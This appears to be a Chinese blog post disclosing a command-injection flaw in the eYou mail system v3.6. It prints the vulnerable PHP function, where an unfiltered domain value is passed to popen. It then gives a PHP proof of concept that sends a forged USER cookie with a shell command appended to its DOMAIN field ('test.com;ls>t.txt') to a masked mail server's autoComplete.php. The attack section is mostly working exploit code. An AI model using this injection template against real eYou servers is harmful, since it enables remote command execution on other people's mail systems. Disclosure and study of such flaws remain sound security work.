eYou邮箱系统v3.6命令执行漏洞

先看eYou的代码:

//获取用户目录
[php]
function getUserDir($uid, $domain) {

$handle = popen("/var/eyou/sbin/hashid $uid $domain", 'r');

$read = fread($handle, 2096);

pclose($handle);

return $read;

}

[/php]
$domain无过滤,直接可以执行。

接着是利用代码,没有现成的哈,自己看着来改就行了。
[php]
public function action_test()

{

$cmd = "ls>t.txt";

$request = Request::factory('http://mail.XXXXXXXXXXXX.cn/user/autoComplete.php?s=1')

->cookie('USER', "LASTONE=fake&ENTER_TYPE=0&NO_EYCM=1&GWJUMP=1&MAXRCPTNUM=150&LANG=zh_CN&TOKEN=z2GYCv1SJ&DOMAIN=test.com;{$cmd}&UID=test&LOGIN_DOMAIN=test.com&LOGIN_UID=timothy&ATTSIZE=10&CALLBACK=0&TRACEMAIL=0&GROUPADDR=0&VIEWLIST=0&GLOBALPERMISSION=0&NOTATION=0&BYTESPERCENT=0&BOOKMARK=1&MOBILEMESSAGE=0&DIALUP=0&VIDEOMAIL=0&SECUREMAIL=0&VOICEMAIL=1&CALENDAR=1&STORAGE=1&TOTALSPACE=200&LOCKSTATUS=0&USERNAME=&EXPTIME=0&LETTERS=5000"A=100&COMPANYADDR=&SKIN=current&")

->cookie('PHPSESSID', 'e1c8798afec734384cd908180e52b1cf')

->execute();

echo Debug::vars($request);

exit;

}[/php]
利用暂时不会放出来。因为某GOV的原因,封杀的很厉害

发表评论